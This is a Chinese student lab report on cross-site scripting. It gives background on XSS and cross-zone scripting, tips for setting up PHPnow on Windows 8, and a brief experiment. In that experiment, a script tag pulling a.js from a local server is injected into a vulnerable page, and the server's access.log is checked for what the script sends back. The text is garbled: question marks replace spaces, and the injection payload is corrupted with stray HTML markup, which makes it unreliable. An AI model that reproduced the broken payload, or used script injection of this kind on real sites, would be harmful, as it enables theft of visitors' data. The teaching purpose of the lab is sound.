实验背景:
从Wikipedia搜索跨站脚本,解释到跨区脚本(Cross-zone?Scripting或者Cross?Site?Scripting)是指浏览器利用浏览器一些有漏洞的安全解决方案,这种攻击使没有权限跨站脚本在未经授权的情况下以较高的权限去执行,脚本的执行权限被客户端(Web浏览器)扩大升级了。?
这些XSS跨站脚本漏洞可能是:?
*网页浏览器设计缺陷使得在一定的条件下,一个站点完全信任另外一个高权限的站点(或者连个高低权限区域)并去执行高权限站点的脚本。?
*网页浏览器配置错误,把不安全的网站放在浏览器高信任列表。?
*信任站点(特权区域)存在跨站脚本漏洞?
一般的跨站脚本攻击包含两个步骤。首先是利用跨站脚本漏洞以一个特权模式去执行攻击者构造的脚本,然后利用不安全的ActiveX控件执行恶意的行为。通常在安静模式让计算机浏览攻击者指定的网页悄悄下载安装各种恶意代码,如间谍软件、木马软件、蠕虫等。
实验环境:
PHO?NOW环境的搭建
对于绝大多数同学来说,这个PHPNOW环境的搭建并不是一件非常困难的事情,这取决于同学们所使用的操作系统。对于WIN?8或者?WIN8.1的同学来说,这就是需要注意的一个问题。
一般来说,有这么几种问题:
一、?很多同学以前曾经装过PHPNOW或者错误的安装过,之后又直接删除掉了整个文件夹。这样会有残留的注册表项或者子进程一直在后台运行,此时需要强行卸载。方法是使用PHPNOW文件夹下面的pncp.cmd,选择33。强行终止进程并卸载,这样就可以完整的卸载掉整个软件,之后可以重新安装
?
二、?第二种问题,就是但对于使用win8或者win8.1的同学们来说经常会遇到的问题。会出现两条原因:一条是服务器名已经被使用,一条是需要管理员权限,在这里我们使用如下的解决方法:
a)?一是强行卸载之后,重新启动计算机再做尝试
b)?二是在计算机右下角右击->命令提示符(管理员),在打开的cmd窗口中进入到PHPNOW的文件夹目录之下,运行setup.cmd,这个时候再根据提示进行就可以安装完成。操作步骤和linux下类似,非常简单,就不再赘述。
?
这里要切记设置好自己的密码,不要忘记,之后就完成了整个软件的安装。
参考From:?http://jingyan.baidu.com/article/cb5d61050c9ce6005d2fe040.html
实验过程:
打开浏览器,输入127.0.0.1,打开
?
输入127.0.0.1/a.js,出现如下界面
?
?
打开之前找到的网址
改掉后面的内容,输入
<script><span><span class="16" style="text-decoration: underline; font-family: 'Times New Roman'; color: #0563c1;">http://</script>127.0.0.1/a.js">
?
?
可以在access.log里面得到这样的内容,由于网站会自行转码,所以无法直接阅读,需要进一步的转码才可以